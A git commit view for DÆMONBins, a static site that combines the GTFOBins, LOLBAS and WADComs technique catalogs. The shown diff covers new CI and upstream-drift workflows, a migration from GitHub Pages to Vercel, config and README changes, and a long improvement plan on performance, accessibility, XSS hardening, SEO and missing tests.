daemon-sec-lotl

DÆMONBins: GTFOBins × LOLBAS × WADComs × LOOBins in one filterable catalog
git clone https://git.daemon-sec.xyz/daemon-sec-lotl.git
Log | Files | Refs | Submodules | README | LICENSE

commit 52cdd96ffaee2eb6c10c390c3eab1956e94e95e7
parent 6b61e24699ff260926575224bb1f9d676076ef0d
Author: DAEMON <zer0sec.xp@icloud.com>
Date:   Fri,  4 Sep 2026 05:37:36 +0100

feat: add CI validation gate, SEO/social metadata, catalog UX, and a11y fixes

Commit-Date: 2026-09-04T05:38:02+01:00
Commit-Host: omarchy

Diffstat:
A.github/workflows/ci.yml | 56++++++++++++++++++++++++++++++++++++++++++++++++++++++++
D.github/workflows/deploy.yml | 46----------------------------------------------
A.github/workflows/upstream-drift.yml | 60++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
M.gitignore | 2++
MREADME.md | 52++++++++++++++++++++++++++++++++++++++++++----------
Mastro.config.mjs | 65++++++++++++++++++++++++++---------------------------------------
Adocs/IMPROVEMENT-PLAN.md | 716+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Mpackage-lock.json | 879+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Mpackage.json | 14+++++++++++---
Apublic/og.png | 0
Mpublic/og.svg | 55++++++++++++++++++++++++++++++++++++-------------------
Mscripts/build-dataset.mjs | 82++++++++++++++++++++++++-------------------------------------------------------
Ascripts/build-index.mjs | 55+++++++++++++++++++++++++++++++++++++++++++++++++++++++
Ascripts/og.mjs | 137+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Ascripts/split-impacket.mjs | 117+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Ascripts/technique-schema.mjs | 71+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Ascripts/validate-data.mjs | 80+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Ascripts/wadcoms-normalize.mjs | 97+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Msrc/components/Header.astro | 8+++++++-
Asrc/components/HeroDeck.astro | 301+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Msrc/components/SearchModal.astro | 34+++++++++++++++++++++++++++++-----
Msrc/components/SectionBanner.astro | 212-------------------------------------------------------------------------------
Msrc/data/facets.json | 6+++---
Asrc/data/index-hash.json | 6++++++
Msrc/data/techniques.json | 4++--
Msrc/data/tools.json | 4++--
Msrc/layouts/Base.astro | 46++++++++++++++++++++++++++++++++++++++++++----
Asrc/lib/jsonld.ts | 153+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Asrc/lib/render-row.ts | 116+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Msrc/pages/[source]/[tool].astro | 27+++++++++++++++++++++------
Msrc/pages/[source]/index.astro | 2+-
Msrc/pages/catalog.astro | 31+++++++++++++++++++++++++------
Msrc/pages/credits.astro | 2++
Msrc/pages/index.astro | 153+++++++++++++++++++++++++++++++++++++++++++++++++++++++------------------------
Asrc/pages/robots.txt.ts | 18++++++++++++++++++
Msrc/scripts/app.ts | 54+++++++++++++++++++++++++++++++++++++++++++++++++++++-
Msrc/scripts/catalog.ts | 228++++++++++++++++++++++++++++++++++++-------------------------------------------
Msrc/scripts/copy.ts | 53++++++++++++++++++++++++++++++-----------------------
Asrc/scripts/fuzz.ts | 188+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Asrc/scripts/hero.ts | 65+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Msrc/styles/global.css | 19+++++++++++++++++++
Atest/_loadts.mjs | 29+++++++++++++++++++++++++++++
Atest/highlight.test.mjs | 31+++++++++++++++++++++++++++++++
Atest/techniques.test.mjs | 69+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Atest/wadcoms.test.mjs | 34++++++++++++++++++++++++++++++++++
Avercel.json | 58++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
46 files changed, 3924 insertions(+), 611 deletions(-)

diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml @@ -0,0 +1,56 @@ +# Quality gate. Vercel builds and deploys on its own; this workflow exists so a +# broken dataset, a type error or a failing test is visible on the PR / commit +# before (or regardless of) the deploy. Nothing here writes to the repo. +name: CI + +on: + push: + branches: [main] + pull_request: + workflow_dispatch: + +permissions: + contents: read + +concurrency: + group: ci-${{ github.ref }} + cancel-in-progress: true + +jobs: + quality: + name: check · test · validate data + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: actions/setup-node@v4 + with: + node-version: 22 + cache: npm + - run: npm ci + - name: Typecheck (astro check) + run: npm run check + - name: Unit tests (node --test) + run: npm test + - name: Validate committed dataset + run: npm run validate:data + + build: + name: astro build + pagefind + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: actions/setup-node@v4 + with: + node-version: 22 + cache: npm + - run: npm ci + - run: npm run build + - name: Sanity-check the output + run: | + test -f dist/index.html + test -f dist/catalog/index.html + test -f dist/sitemap-index.xml + test -f dist/pagefind/pagefind.js + # Canonicals must not point at a redirect (vercel.json: trailingSlash false). + if grep -q 'rel="canonical" href="[^"]*/"' dist/catalog/index.html; then + echo "::error::canonical on /catalog carries a trailing slash"; exit 1; fi diff --git a/.github/workflows/deploy.yml b/.github/workflows/deploy.yml @@ -1,46 +0,0 @@ -name: Deploy to GitHub Pages - -on: - push: - branches: [main] - workflow_dispatch: - -permissions: - contents: read - pages: write - id-token: write - -concurrency: - group: pages - cancel-in-progress: true - -jobs: - build: - runs-on: ubuntu-latest - steps: - - name: Checkout - uses: actions/checkout@v4 - - name: Setup Node - uses: actions/setup-node@v4 - with: - node-version: 22 - cache: npm - - name: Install - run: npm ci - - name: Build (Astro + Pagefind) - run: npm run build - - name: Upload artifact - uses: actions/upload-pages-artifact@v3 - with: - path: dist - - deploy: - needs: build - runs-on: ubuntu-latest - environment: - name: github-pages - url: ${{ steps.deployment.outputs.page_url }} - steps: - - name: Deploy - id: deployment - uses: actions/deploy-pages@v4 diff --git a/.github/workflows/upstream-drift.yml b/.github/workflows/upstream-drift.yml @@ -0,0 +1,60 @@ +# Weekly freshness check. The dataset is regenerated by hand (`npm run data` +# needs the vendored upstreams), so nothing would otherwise tell us that +# GTFOBins / LOLBAS / WADComs moved on. This compares each upstream's current +# HEAD against the short hash recorded in src/data/facets.json and opens (or +# updates) a single tracking issue when any of them drifted. +name: Upstream drift + +on: + schedule: + - cron: '17 6 * * 1' # Mondays 06:17 UTC + workflow_dispatch: + +permissions: + contents: read + issues: write + +jobs: + drift: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: Compare upstream HEADs with facets.json + id: cmp + shell: bash + run: | + set -euo pipefail + declare -A REPO=( + [gtfobins]=https://github.com/GTFOBins/GTFOBins.github.io + [lolbas]=https://github.com/LOLBAS-Project/LOLBAS + [wadcoms]=https://github.com/WADComs/WADComs.github.io + ) + drift=0; body="" + for name in gtfobins lolbas wadcoms; do + pinned=$(node -p "require('./src/data/facets.json').commits.$name || ''") + head=$(git ls-remote "${REPO[$name]}" HEAD | cut -c1-7) + if [ -z "$pinned" ]; then + body+="- **$name**: no pinned commit recorded (upstream HEAD \`$head\`)"$'\n'; drift=1 + elif [ "$pinned" != "$head" ]; then + body+="- **$name**: pinned \`$pinned\`, upstream HEAD \`$head\` — ${REPO[$name]}/compare/$pinned...$head"$'\n'; drift=1 + else + body+="- $name: up to date (\`$pinned\`)"$'\n' + fi + done + echo "drift=$drift" >> "$GITHUB_OUTPUT" + { echo 'body<<EOF'; echo "$body"; echo 'EOF'; } >> "$GITHUB_OUTPUT" + - name: Open or update the tracking issue + if: steps.cmp.outputs.drift == '1' + env: + GH_TOKEN: ${{ github.token }} + BODY: ${{ steps.cmp.outputs.body }} + run: | + title="Upstream drift: dataset is behind GTFOBins / LOLBAS / WADComs" + text="$(printf '%s\n\n%s\n\n%s' "Detected by the weekly drift check on $(date -u +%F)." "$BODY" 'Refresh with `git submodule update --remote vendor/gtfobins vendor/lolbas vendor/wadcoms && npm run data`, then commit `src/data/*.json`.')" + existing=$(gh issue list --label upstream-drift --state open --json number --jq '.[0].number // empty') + if [ -n "$existing" ]; then + gh issue comment "$existing" --body "$text" + else + gh label create upstream-drift --color c4a7e7 --description "Dataset behind an upstream" 2>/dev/null || true + gh issue create --title "$title" --label upstream-drift --body "$text" + fi diff --git a/.gitignore b/.gitignore @@ -10,3 +10,5 @@ dist/ .playwright-mcp/ # Client copy of the dataset — generated from src/data at build time /public/data/ +# Vercel build/CLI output +.vercel/ diff --git a/README.md b/README.md @@ -11,15 +11,15 @@ [![License](https://img.shields.io/badge/license-GPL--3.0-f6c177?style=flat-square&labelColor=191724)](./LICENSE) [![Built with Astro](https://img.shields.io/badge/Astro-5-c4a7e7?style=flat-square&labelColor=191724&logo=astro&logoColor=c4a7e7)](https://astro.build) [![Search: Pagefind](https://img.shields.io/badge/search-Pagefind-9ccfd8?style=flat-square&labelColor=191724)](https://pagefind.app) -[![Deploy: GitHub Pages](https://img.shields.io/badge/deploy-GitHub_Pages-31748f?style=flat-square&labelColor=191724&logo=githubpages&logoColor=e0def4)](https://daemon-404.github.io/daemon-sec-lotl/) +[![Deploy: Vercel](https://img.shields.io/badge/deploy-Vercel-e0def4?style=flat-square&labelColor=191724&logo=vercel&logoColor=e0def4)](https://lotl.daemon-sec.xyz/) [![Theme: Rosé Pine](https://img.shields.io/badge/theme-Ros%C3%A9_Pine-ebbcba?style=flat-square&labelColor=191724)](https://rosepinetheme.com) -[![Techniques](https://img.shields.io/badge/techniques-2885-eb6f92?style=flat-square&labelColor=191724)](https://daemon-404.github.io/daemon-sec-lotl/catalog) -[![Tools](https://img.shields.io/badge/tools-814-9ccfd8?style=flat-square&labelColor=191724)](https://daemon-404.github.io/daemon-sec-lotl/catalog) -[![DÆMON additions](https://img.shields.io/badge/D%C3%86MON_NEW-179-f6c177?style=flat-square&labelColor=191724)](https://daemon-404.github.io/daemon-sec-lotl/daemon) +[![Techniques](https://img.shields.io/badge/techniques-2885-eb6f92?style=flat-square&labelColor=191724)](https://lotl.daemon-sec.xyz/catalog) +[![Tools](https://img.shields.io/badge/tools-842-9ccfd8?style=flat-square&labelColor=191724)](https://lotl.daemon-sec.xyz/catalog) +[![DÆMON additions](https://img.shields.io/badge/D%C3%86MON_NEW-179-f6c177?style=flat-square&labelColor=191724)](https://lotl.daemon-sec.xyz/daemon) [![Sources](https://img.shields.io/badge/decks-4-c4a7e7?style=flat-square&labelColor=191724)](#the-four-decks) -**[ Open the catalog → ](https://daemon-404.github.io/daemon-sec-lotl/catalog)** +**[ Open the catalog → ](https://lotl.daemon-sec.xyz/catalog)** </div> @@ -43,7 +43,7 @@ All three upstreams are GPL-3.0, so this combined work is **GPL-3.0**. See | 💜 **LOLBAS** | `7aca936` | 481 | Windows living-off-the-land binaries, scripts & libraries; execute, download, AWL bypass | | 💛 **WADComs** | `a864cd1` | 100 | Offensive Windows / Active Directory tooling, indexed by what access you hold | | ❤️ **DÆMON** | *authored* | 179 | 134 fact-checked WADComs additions + a 45-entry modern 2024–2026 backlog, each badged **NEW** | -| | **Total** | **2,885** | **814 tools · all Zod-validated** | +| | **Total** | **2,885** | **842 tools · all Zod-validated** | Everything is placeholder-only reference material (lab IPs, `test.local`, `john` / `password123`) in the spirit of GTFOBins, LOLBAS, WADComs and MITRE ATT&CK. @@ -53,6 +53,8 @@ in the spirit of GTFOBins, LOLBAS, WADComs and MITRE ATT&CK. ``` vendor/{gtfobins,lolbas,wadcoms} the three upstreams (vendored; see setup-vendor.sh) scripts/build-dataset.mjs local ingestion → src/data/*.json + public/data +scripts/wadcoms-normalize.mjs WADComs family fixes (Impacket split, case-fold) +scripts/split-impacket.mjs one-shot, idempotent migration of the committed data src/data/techniques.json the canonical, committed dataset (a Technique[]) src/data/tools.json per-tool metadata (aliases, Full_Path, contributors) src/data/facets.json derived facet indexes + counts + upstream commits @@ -67,6 +69,13 @@ Routing is by toolId **namespace** (`gtfo:`/`lolbas:`/`wadcoms:`/`daemon:`), so resolves to one page even when a family mixes upstream and DÆMON-authored techniques; a per-technique NEW badge conveys authorship. +**Impacket** is a *suite*, not one tool, so its ~48 WADComs techniques are split back out by their +actual `examples/<script>.py` — one page per script (`Impacket-secretsdump`, `Impacket-ntlmrelayx`, +…). Case-duplicate WADComs families (e.g. `Enum4Linux` / `enum4linux`) are folded onto one canonical +page so the static router never silently drops a tool. Both normalisations live in +`scripts/wadcoms-normalize.mjs` and are applied by `npm run data` and the one-shot +`scripts/split-impacket.mjs`. + ## 🩵 Develop ```bash @@ -97,10 +106,33 @@ npm run data ## 💜 Deploy -`.github/workflows/deploy.yml` builds on push to `main` and publishes `dist/` to GitHub Pages. -Set **Settings → Pages → Source: GitHub Actions**. The base path is `/daemon-sec-lotl` -(`astro.config.mjs`); for a user-root repo or a custom domain, empty the `base` and the `url()` -helper / `rehypeBaseLinks` become no-ops. +The site is a static build hosted on **[Vercel](https://vercel.com)** at the domain root — no base +path. Import the GitHub repo as a Vercel project (framework preset: **Astro**) and it deploys on +every push to `main`; `vercel.json` pins the build: + +```jsonc +{ + "framework": "astro", + "buildCommand": "npm run build", // data:public + astro build + pagefind index + "installCommand": "npm ci", + "outputDirectory": "dist", + "cleanUrls": true, + "trailingSlash": false +} +``` + +`npm run build` runs Pagefind over `dist/` and copies the index back into `public/`, so offline +search ships with the static output — no adapter, no serverless functions. Set the production origin +in one place — `SITE` in `astro.config.mjs` (used for the sitemap, canonical URLs and Open Graph) — +to the project's real Vercel domain (custom domain, or the default `*.vercel.app` URL). + +**Web Analytics / Speed Insights** are wired in `src/layouts/Base.astro` (production only, cookieless, +zero-dependency) and light up once you enable them under the Vercel project's *Analytics* / +*Speed Insights* tabs. + +Because there is no base path, `src/lib/url.ts`'s `url()` helper is a passthrough (it only guarantees +a leading slash); if the site is ever moved back under a sub-path, set `base` in `astro.config.mjs` +and every internal link already routes through `url()`. ## ❤️ Scope diff --git a/astro.config.mjs b/astro.config.mjs @@ -4,39 +4,17 @@ import mdx from '@astrojs/mdx'; import sitemap from '@astrojs/sitemap'; /** - * DÆMONBins is served as a GitHub Pages *project* page at - * https://daemon-404.github.io/daemon-sec-lotl/, so every internal link has - * to carry the `/daemon-sec-lotl` prefix. Astro-rendered links go through - * `src/lib/url.ts`'s `url()` helper; this rehype plugin catches the remaining - * case — root-absolute `/...` links and images written inside markdown/MDX - * prose (the Credits page, notes) — and rewrites them to include the base so - * they resolve under the sub-path. Leave `base` empty (and this becomes a - * no-op) for a user-root repo or a custom-domain CNAME. + * DÆMONBins deploys to Vercel at the domain root — no base path — so every + * internal link resolves from `/`. `src/lib/url.ts`'s `url()` helper stays the + * single chokepoint for internal links (with an empty base it is a passthrough + * that just guarantees a leading slash), which keeps the components portable if + * the site is ever moved back under a sub-path. + * + * `site` is used for the sitemap, canonical URLs and Open Graph tags. Set it to + * the site's real production origin — the Vercel custom domain (or the default + * `*.vercel.app` URL) once known. */ -const BASE = '/daemon-sec-lotl'; - -function rehypeBaseLinks() { - const prefix = BASE.replace(/\/$/, ''); - const rewrite = (value) => { - if (typeof value !== 'string') return value; - // Only root-absolute, same-origin paths. Skip protocol-relative (//), - // anchors, and anything already under the base. - if (!value.startsWith('/') || value.startsWith('//')) return value; - if (prefix && (value === prefix || value.startsWith(prefix + '/'))) return value; - return prefix + value; - }; - return (tree) => { - const walk = (node) => { - if (node.type === 'element') { - const p = node.properties || {}; - if (node.tagName === 'a' && p.href) p.href = rewrite(p.href); - if ((node.tagName === 'img' || node.tagName === 'source') && p.src) p.src = rewrite(p.src); - } - if (node.children) for (const child of node.children) walk(child); - }; - walk(tree); - }; -} +const SITE = 'https://lotl.daemon-sec.xyz'; /** * The drop cap, matching the cheatsheet/main site: the opening letter of a @@ -45,25 +23,31 @@ function rehypeBaseLinks() { */ const CAP_MIN_CHARS = 80; function rehypeDropCap() { + /** @param {any} node hast node */ function textLength(node) { if (node.type === 'text') return node.value.trim().length; if (!node.children) return 0; - return node.children.reduce((n, c) => n + textLength(c), 0); + return node.children.reduce((/** @type {number} */ n, /** @type {any} */ c) => n + textLength(c), 0); } + /** + * @param {any} node hast node + * @returns {any} the first non-blank hast text node, or null + */ function firstText(node) { if (!node.children) return null; for (const child of node.children) { if (child.type === 'text' && child.value.trim()) return child; if (child.type === 'element') { + /** @type {any} */ const found = firstText(child); if (found) return found; } } return null; } - return (tree) => { + return (/** @type {any} */ tree) => { const paragraph = tree.children.find( - (n) => n.type === 'element' && n.tagName === 'p' && textLength(n) >= CAP_MIN_CHARS, + (/** @type {any} */ n) => n.type === 'element' && n.tagName === 'p' && textLength(n) >= CAP_MIN_CHARS, ); if (!paragraph) return; const lead = firstText(paragraph); @@ -82,12 +66,15 @@ function rehypeDropCap() { } export default defineConfig({ - site: 'https://daemon-404.github.io', - base: BASE, - trailingSlash: 'ignore', + site: SITE, + // 'never' + the default directory output: URLs (sitemap, Astro.url, canonical) + // carry no trailing slash — matching vercel.json's `trailingSlash: false` so + // no canonical ever points at a 308 — while files still land as + // …/index.html, which keeps Pagefind's result hrefs clean. + trailingSlash: 'never', integrations: [mdx(), sitemap()], markdown: { - rehypePlugins: [rehypeBaseLinks, rehypeDropCap], + rehypePlugins: [rehypeDropCap], shikiConfig: { // One theme in both modes — code blocks are dark plates everywhere, so // there is no light listing to flip to (see prose.css). diff --git a/docs/IMPROVEMENT-PLAN.md b/docs/IMPROVEMENT-PLAN.md @@ -0,0 +1,716 @@ +# DÆMONBins — Improvement Plan + +> Living document, written incrementally during the planning session on 2026-09-04. Lives at +> `docs/IMPROVEMENT-PLAN.md`; tick items off here as they land. + +## Context + +DÆMONBins is a static catalog merging GTFOBins × LOLBAS × WADComs (+ DÆMON-authored additions) +into one filterable Technique index. The site has just been migrated from GitHub Pages to Vercel +(uncommitted working tree: `deploy.yml` deleted, `vercel.json` added, `robots.txt.ts`, +`HeroDeck.astro`, `hero.ts`, `fuzz.ts` new). The user wants a **prioritised plan for the next +round of improvements** — not a single feature — so this document surveys the site as it stands, +records concrete findings, and turns them into an ordered backlog with enough detail to execute. + +## Survey log (what was inspected, in order) + +- [x] `package.json`, `astro.config.mjs`, `vercel.json`, `README.md` — read. + - Build: `data:public` → `astro build` → `pagefind --site dist` → copies pagefind into `public/` + (odd: `public/pagefind` is regenerated from `dist/pagefind` after the build; only matters for + `astro dev`). + - `test` script is `node --test` but no test files are known yet — verify. + - `site` is `https://lotl.daemon-sec.xyz`; sitemap + MDX integrations on; Shiki `rose-pine-moon`. + - Headers in `vercel.json`: nosniff, referrer, frame-ancestors, HSTS. No full CSP yet. +- [ ] `src/pages/*` — routes, SEO tags, OG image. +- [ ] `src/scripts/{app,catalog,hero,fuzz}.ts` — the client islands. +- [ ] `src/lib/*` — taxonomy, techniques, url helpers. +- [ ] `src/data/*.json` + `scripts/build-dataset.mjs` — data quality. +- [ ] `src/styles/*`, `src/components/*` — design system, a11y. +- [x] Working-tree diff (`git diff`) — what the in-flight Vercel migration changed. + - `astro.config.mjs`: dropped `base: '/daemon-sec-lotl'` + the `rehypeBaseLinks` plugin; `site` + is now `https://lotl.daemon-sec.xyz`. `url()` helper kept as the link chokepoint. + - `Base.astro`: added Vercel Web Analytics + Speed Insights `<script>`s (PROD only) and a + `.skip-link` (styled in `global.css`). Uses `<ClientRouter />` (view transitions). + - `Header.astro`: GitHub icon + nav link (`DAEMON-404/daemon-sec-lotl`). + - `app.ts`: new `initFuzz()`, `initHero()`, `initCounters()` (data-count roll-up with + reduced-motion + IntersectionObserver). + - `build-dataset.mjs`: Impacket suite split + family case-fold via `wadcoms-normalize.mjs`. + - `SectionBanner.astro`: −212 lines = its inline `<script>` (the canvas "fuzz" signal field) + was lifted into `src/scripts/fuzz.ts` and is now driven by `app.ts` → `initFuzz()`. Still + used by `404.astro` and `[source]/index.astro`. + - `index.astro`: `SlantTitle` hero replaced by new `HeroDeck.astro`; added "By platform" + counters (`data-count`) and `data-reveal` on deck cards. + - **No test files anywhere** (`find . -name '*.test.*'` → 0). `npm test` is a no-op. + - **`vendor/` is absent on this machine** — `npm run data` cannot run here until + `scripts/setup-vendor.sh` / submodules are checked out. Builds don't need it (committed JSON). + - `.github/workflows/deploy.yml` deleted → **no CI at all now** (Vercel builds on push, but + nothing runs data validation / typecheck / tests before merge). +- [x] `dist/` output size + Lighthouse-style checks (sizes measured below; no Lighthouse run — + the site is not deployed yet, so Speed Insights will provide field data after Track 1). + - Sizes: `dist/` 34 MB total; `public/pagefind` 4.5 MB; `src/data/techniques.json` 2.0 MB and + copied verbatim to `public/data/techniques.json` (client payload); `tools.json` 244 KB. + - `dist/sitemap-0.xml` 57 KB (~850 URLs). + +## Findings + +### F1. No CI / quality gate after the Pages→Vercel move +`deploy.yml` was deleted with the migration. `package.json` still has `"test": "node --test"` +but no test files exist (to confirm). Nothing runs `astro check`, the Zod validation in +`build-dataset.mjs`, or link checks before a deploy. Vercel will happily deploy a broken data +file as long as `astro build` passes. + +### F2. Client payload: the full 2 MB dataset ships to the browser +`public/data/techniques.json` is a byte-for-byte copy of the canonical file. Measured: + +| artefact | raw | gzip -9 | brotli -11 | +|---|--:|--:|--:| +| `techniques.json` | 2,046,894 B | 220,979 B | 165,461 B | + +Vercel serves brotli for static files, so the wire cost is ~165 KB — acceptable but it is +parsed into ~2 MB of JS objects on every catalog visit. Still worth a slim list projection +(who fetches it and which fields dominate → data-agent findings below). + +Built page sizes (uncompressed HTML): `/catalog` 17 KB (so the catalog is client-rendered), +`/gtfobins` 181 KB, `/lolbas` 104 KB, `/gtfobins/bash` 89 KB, home 30 KB. The per-deck index +pages are heavy because every tool card is server-rendered — fine for SEO, but check that the +`_tool_` CSS (78 KB!) isn't shipping unused rules. Largest JS chunk: `Base.astro` script 13.6 KB ++ `ClientRouter` 15 KB + `catalog` 9 KB + `SearchModal` 5 KB. Fonts: 15 woff2 files, the +variable Noto Sans Display alone is 70 KB — check `font-display` and preload strategy. + +Pagefind: 4.5 MB index (21 `.pf_index` + 842 fragments) — loaded on demand from +`SearchModal.astro:325`. Only `[source]/[tool].astro:48` carries `data-pagefind-body` (+ a +`source:` meta), so search hits are **tool pages only**; the catalog, deck indexes and home are +not indexed (correct — avoids duplicate hits) but the modal can't deep-link to a technique row. +The SearchModal still references a `BASE` constant from the Pages era (`SearchModal.astro:321`) +— confirm it resolves to `''` now. + +CSS: the shared bundle `_tool_.BP7bOQ_a.css` (78 KB) is linked from **every** page (home, +catalog, credits, deck index, tool). Source is 126 KB across 7 files; `daemon.css` (29 KB) and +`global.css` (43 KB) are the cheatsheet design system cloned wholesale — likely a large share of +unused selectors (`.download-library__head`, TOC, callouts, CPTS scroll-progress remain in +`app.ts` too). Candidate for a coverage pass, not a rewrite. + +### F3. Deployment is half-migrated +- `https://lotl.daemon-sec.xyz` **does not resolve** (NXDOMAIN at 2026-09-04) — DNS for the + custom domain is not set up, yet `site`, canonical URLs, OG tags, sitemap and README badges all + point there. Until DNS lands, every canonical/sitemap URL is dead for crawlers. +- The old GitHub Pages URL `https://daemon-404.github.io/daemon-sec-lotl/` still returns 200 + for `/` and `/catalog/`, with `<link rel="canonical">` pointing at **itself** → once Vercel is + live this is true duplicate content competing for the same queries. Pages can't redirect + server-side; options are (a) disable Pages for the repo, or (b) keep a one-off `gh-pages` + branch that only holds stub pages with `<meta http-equiv="refresh">` + canonical → new domain + for every old URL. (a) is simpler; (b) preserves inbound links. Recommend (b) for ~30 days + then (a). Confirmed via `gh api repos/DAEMON-404/daemon-sec-lotl/pages`: Pages is still + **enabled** with `build_type: workflow` — since the workflow is now deleted, the last Pages + deployment will stay live indefinitely until Pages is switched off in repo settings. +- `.github/` directory no longer exists at all (no issue templates, no dependabot, no CI). +- Local toolchain: node v26.7.0 / npm 11.19.0 — `engines: >=20` is satisfied; pin Vercel's + Node version explicitly (project setting or `"node": "22.x"`) so a Vercel default bump can't + silently change the build. +- `https://daemon-sec-lotl.vercel.app` → 404. Checked the Vercel account via the Vercel MCP: + team `00xnetrunners-projects` (Pro plan) has only two projects, `daemon-sec` (the main site) + and `eve-chat-template`. **There is no Vercel project for this repo yet.** The migration in + the working tree (vercel.json, analytics scripts, `site` URL) is ahead of the actual + infrastructure: create the project (GitHub import, preset Astro), add the `lotl.daemon-sec.xyz` + domain, then a CNAME/ALIAS in the `daemon-sec.xyz` DNS. +- `vercel.json` has no `redirects`, and no `Cache-Control` override for `/data/*.json` or + `/pagefind/*` (Vercel defaults are fine for hashed `_astro/*`, but `/data/techniques.json` is + unhashed → stale-after-deploy risk unless cache headers are short or the URL is versioned). + +### F4. Catalog island (`src/scripts/catalog.ts`, 211 lines) — functional gaps +Verified by reading the code (line refs are to the working tree): +- **Back button is broken for filters.** URL sync uses `history.replaceState` only + (`catalog.ts:122`) and there is no `popstate` listener. Changing a filter never creates a + history entry, so Back leaves the page instead of undoing the filter. Deep links do work on + first load (`:91`). +- **No sort.** Results render in dataset order only (GTFOBins first, alphabetical by tool). + No "by tool / by source / by capability / NEW first". +- **Facet chips lose keyboard focus.** Clicking a chip calls `renderFacets()` (`:95`) which + `innerHTML`-rebuilds the chip bar (`:133-141`), destroying the focused button → focus drops to + `<body>`. Counts on chips are global totals computed once (`:80-89`), not contextual, so the + rebuild is pure waste. +- **"Show more" collapses expanded rows.** Open state lives only in the DOM (`:168-171`) and + `render()` (`:106`) replaces the whole list; every keystroke re-serialises all visible rows + (400 after ten "Show more" clicks). `PAGE = 40` (`:16`). +- **Text query is a per-call substring scan** (`lib/techniques.ts:85-91`) that concatenates and + lowercases every record on each keystroke (130 ms debounce at `catalog.ts:143-147`). Fine at + 2885 rows but a precomputed lowercase haystack per record would cut allocation to zero. +- Copy does a linear `all.find` per click (`:159`); clipboard logic is duplicated three times + (`copy.ts:5-28`, `catalog.ts:178-189`, `app.ts:317-330`); `url()` is reimplemented at + `catalog.ts:15` instead of importing `lib/url.ts`; `escapeHtml` duplicated in + `SearchModal.astro:350`. +- `Technique.context` and `toolType` are never rendered by the island; `isEmpty` and + `accentOf` in lib are dead exports. +- No fuzzy matching anywhere (`fuzz.ts` is the canvas background, not a fuzzy matcher). + +### F5. Search (`SearchModal.astro`) — solid, but tool-page-only +Opens on `/`, Cmd/Ctrl+K, and `[data-search-open]`; Pagefind loads lazily on first open +(`:316-330`), 8 results, 120 ms debounce, stale-response guard, full listbox ARIA + keyboard +nav. Limitation: results are tool pages, never a specific technique row, and no facet +(platform/source) filtering inside the modal even though `source:` is emitted as Pagefind meta +(`[tool].astro:49`). `escapeHtml` there also escapes `'`, unlike `lib/highlight.ts:6`. + +### F6. XSS surface — clean, with one unvalidated sink +Every `innerHTML`/`set:html` site interpolates through `escapeHtml`/`highlightCommand`. The one +gap: `href` built from `detection.value` and `references[]` (`catalog.ts:48-49`, +`[tool].astro:113,115`) escapes quotes but does not validate the URL scheme; the Zod schema +(`build-dataset.mjs:201`) types references as bare `z.string()`. 0/2885 records are non-http +today, but a bad upstream merge would become a `javascript:` link. Fix at the schema +(`z.string().url()` + `^https?:`), not at render time. + +### F7. Background animation cost (`fuzz.ts`) +The canvas signal field runs a permanent 60 fps rAF loop with a DPR-scaled backing store +(`fuzz.ts:175-179`) and has **no visibility/IntersectionObserver pause** — it keeps painting +while scrolled off-screen and in background tabs (rAF throttles in hidden tabs, but not when +merely off-screen). `hero.ts` already pauses on `visibilitychange` (`:55`); `fuzz.ts` should get +both. Reduced motion is handled (single still frame). + +### F8. Leaks / lifecycle +`initTOC()` in `app.ts:414-432` is the only init without a `data-*-bound` guard: it creates a +new `IntersectionObserver` on every `astro:page-load` and never disconnects. Harmless on this +site (no TOCs) but it's live code that runs on every navigation. `copy.ts:26` fallback never +calls `done()` when `execCommand` throws. + +### F9. Zero tests, zero CI +`"test": "node --test"` runs against nothing. Pure, DOM-free surface that is trivially +testable with `node:test` + no extra deps: `lib/techniques.ts` (`toolSlug`, `filtersToSearch` +↔ `filtersFromSearch` round-trip, `matches`), `lib/highlight.ts` (`escapeHtml`, +`highlightCommand` output never contains raw `<` from input), `scripts/wadcoms-normalize.mjs` +(`impacketScript`, `canonicalizeFamilyCase`). No TODO/FIXME anywhere in `src/`. + +### F10. The catalog is invisible to crawlers and JS-off readers +`dist/catalog/index.html` is 17 KB: `[data-cat-results]` ships empty with "Loading the index…" +(`catalog.astro:40`). Zero of 2885 techniques are in the catalog HTML. They *are* SSR'd on the +842 tool pages, so the content is indexable, but `/catalog?p=Windows&c=...` deep links share one +generic title/description and render nothing without JS. Options, cheapest first: (a) SSR the +first `PAGE` rows into the shell so there is a first paint + crawlable sample; (b) generate +static per-facet landing pages (`/catalog/windows`, `/catalog/privilege-escalation`) from +`facets.json` with real titles; (c) both. + +### F11. SEO / social bugs (all in `Base.astro` / `public/og.svg`) +- `og:image` is **relative** (`Base.astro:41` → `content="/og.svg"`); OG requires absolute. +- The OG image is an **SVG** — unsupported by Facebook, X, LinkedIn, Slack, Discord. +- `public/og.svg` is the **wrong site's card** ("DÆMON//SEC — The cheatsheet vault…"). +- Missing: `og:url`, `og:site_name`, `og:image:width/height/alt`, `twitter:title`, + `twitter:description`, `twitter:image`. `twitter:card=summary_large_image` with no image is a + no-op. +- **No JSON-LD** anywhere. Tool pages → `TechArticle` + `BreadcrumbList`; home → `WebSite` with + `SearchAction`; the dataset itself → `Dataset` (with the GPL licence + upstream `isBasedOn`). +- **Canonicals and sitemap emit trailing slashes** (`…/catalog/`) but `vercel.json` sets + 